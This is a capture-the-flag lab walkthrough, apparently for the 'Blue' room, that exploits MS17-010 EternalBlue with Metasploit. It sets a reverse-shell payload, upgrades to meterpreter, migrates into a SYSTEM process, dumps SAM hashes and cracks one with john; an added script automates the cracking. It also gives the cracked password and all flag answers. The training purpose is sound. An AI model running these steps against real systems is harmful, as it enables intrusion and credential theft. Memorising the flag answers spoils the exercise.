Blue Exploit

Recon

s1: nmap -sV -sC --script vuln -oN blue.nmap 10.10.95.33 | version detection, default scripts and the vuln NSE category, output saved to blue.nmap | the smb-vuln-ms17-010 script reports the host as VULNERABLE (MS17-010 / EternalBlue)

Exploit / Gain Access

s2: start metasploit | msfconsole

s3: search ms17-010 | use 0 picks the first result, exploit/windows/smb/ms17_010_eternalblue (the index depends on your module list, so use exploit/windows/smb/ms17_010_eternalblue by name is the safe form)

s4: show options > set RHOSTS 10.10.95.33 | also set LHOST to your own VPN interface address, since a reverse_tcp payload connects back to you

s5: show payloads | payload/windows/x64/shell/reverse_tcp (number 55 in this listing; the number changes between Metasploit versions)

s6: set payload 55 works against the listing above, set payload windows/x64/shell/reverse_tcp is the portable form

s7: run (or exploit) | on success you land in a Windows command shell at C:\Windows\system32>

s8: background the shell | Ctrl + Z, confirm with y

Escalate

s9: upgrade the shell to meterpreter with the shell_to_meterpreter post module > use post/multi/manage/shell_to_meterpreter | https://null-byte.wonderhowto.com/how-to/upgrade-normal-command-shell-metasploit-meterpreter-0166013/

show options > set SESSION 1 (the id of the backgrounded shell) > run

alternative: sessions -u 1 upgrades session 1 in one step

sessions - lists all running sessions (the original shell stays as session 1, the new meterpreter appears as session 2)

sessions -i 2 to interact with session 2 (the meterpreter)

shell drops into the Windows command line to verify escalation > whoami should print nt authority\system (getuid shows the same from inside meterpreter) > Ctrl + Z backgrounds the shell channel and returns to the meterpreter prompt

s10: list all running processes with the ps command. Just because we are SYSTEM doesn't mean our process is stable: find a process towards the bottom of the list that runs as NT AUTHORITY\SYSTEM and write down its process id (spoolsv.exe is a good pick, it is long-lived and x64 like our payload)

 PID   PPID  Name         Arch  Session  User               Path
 1292  704   spoolsv.exe  x64   0        NT AUTHORITY\SYST  C:\Windows\System3

(User and Path columns are cut off in the capture)

s11: migrate into that process | migrate 1292 | getuid afterwards should still report NT AUTHORITY\SYSTEM

Cracking

s12: dump the non-default user's password hash and crack it!

hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

s13: crack the Jon hash | Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d::: | the third field aad3b435b51404eeaad3b435b51404ee means no LM hash is stored, the fourth field is the NT hash that gets cracked. Administrator and Guest carry 31d6cfe0d16ae931b73c59d7e0c089c0, the NT hash of an empty password, so there is nothing to crack there

save the full line into a .txt file = hash.txt (john's NT format reads pwdump lines as-is)

paste the NT hash into https://www.tunnelsup.com/hash-analyzer/ to confirm the hash type (NTLM)

using john the ripper run the command

john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt '/root/hash.txt' | password = alqfna22 | john --show --format=NT /root/hash.txt reprints the cracked user:password from the pot file later
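Steps s12 and s13 as a small script: it triages the hashdump output before anything is sent to john, so blank-password built-ins are not "cracked" and any stored LM hash is flagged, then writes only the crackable lines to hash.txt and runs the same john command. This is an added example, not part of the original notes; it assumes pwdump-format hashdump lines, john installed, and rockyou.txt at the path used above. The embedded hashdump is a constructed copy of the one in the notes.

```shell
#!/bin/sh
# Added example (not from the original notes): triage a meterpreter hashdump
# before cracking so only accounts with a real password reach john.
# Assumptions: pwdump-format lines (user:rid:lm:nt:::), john installed,
# wordlist path as in the notes.

# An LM field of aad3b435b51404eeaad3b435b51404ee means "no LM hash stored"
# (normal on Windows 7 and later); an NT field of 31d6cfe0d16ae931b73c59d7e0c089c0
# is the NT hash of the empty string, i.e. the account has a blank password.
EMPTY_LM='aad3b435b51404eeaad3b435b51404ee'
EMPTY_NT='31d6cfe0d16ae931b73c59d7e0c089c0'

# Constructed copy of the hashdump from the notes, used as offline input.
SAMPLE_HASHDUMP='Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::'

# One summary line per account: user RID builtin|user no-lm|LM-STORED blank-password|has-password
triage_hashdump() {
    awk -F: -v elm="$EMPTY_LM" -v ent="$EMPTY_NT" '
        NF < 4 { next }                                   # skip non-pwdump lines
        {
            kind = ($2 < 1000) ? "builtin" : "user"       # RIDs below 1000 are well-known accounts
            lm   = (tolower($3) == elm) ? "no-lm" : "LM-STORED"   # LM present = legacy, trivially crackable
            nt   = (tolower($4) == ent) ? "blank-password" : "has-password"
            print $1, $2, kind, lm, nt
        }'
}

# Pass through only the pwdump lines worth cracking: a non-blank NT hash.
# Output stays in pwdump form, which john --format=NT parses directly.
select_crackable() {
    awk -F: -v ent="$EMPTY_NT" 'NF >= 4 && tolower($4) != ent { print }'
}

# Step s13 as a function: filter stdin, save to hash.txt, crack, show results.
crack_nt_hashes() {
    wordlist="${1:-/usr/share/wordlists/rockyou.txt}"
    outfile="${2:-hash.txt}"
    select_crackable > "$outfile"
    john --format=NT --wordlist="$wordlist" "$outfile"
    john --show --format=NT "$outfile"      # prints user:password for cracked entries
}

# Usage: printf '%s\n' "$SAMPLE_HASHDUMP" | BLUE_RUN_JOHN=1 sh crack.sh
# (or pipe real hashdump output in; the first argument overrides the wordlist)
if [ "${BLUE_RUN_JOHN:-0}" = "1" ]; then
    crack_nt_hashes "$@"
fi
```

On this box the triage output is what you would expect for a lone local user: both built-ins are blank-password, nothing has an LM hash, and only the Jon line is written to hash.txt.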

Finding flags

Flag 1:

cd C:/ > cat flag1.txt

flag: flag{access_the_machine}

Flag 2:

google "windows sam file location": the SAM database lives at C:\Windows\System32\config\SAM, and flag2.txt sits in that same directory | c:\Windows\System32\config\flag2.txt

cd C:/Windows/System32/config > cat flag2.txt OR

cat 'c:\Windows\System32\config\flag2.txt'

flag: flag{sam_database_elevated_access}

Flag 3:

Alternatively, use the meterpreter search function to find the file's location

search -f flag*.txt | finds c:\Users\Jon\Documents\flag3.txt

cat the path with every backslash doubled, or with the whole path in single quotes | cat c:\\Users\\Jon\\Documents\\flag3.txt | cat 'c:\Users\Jon\Documents\flag3.txt'

or cd C:/Users/Jon/Documents > cat flag3.txt
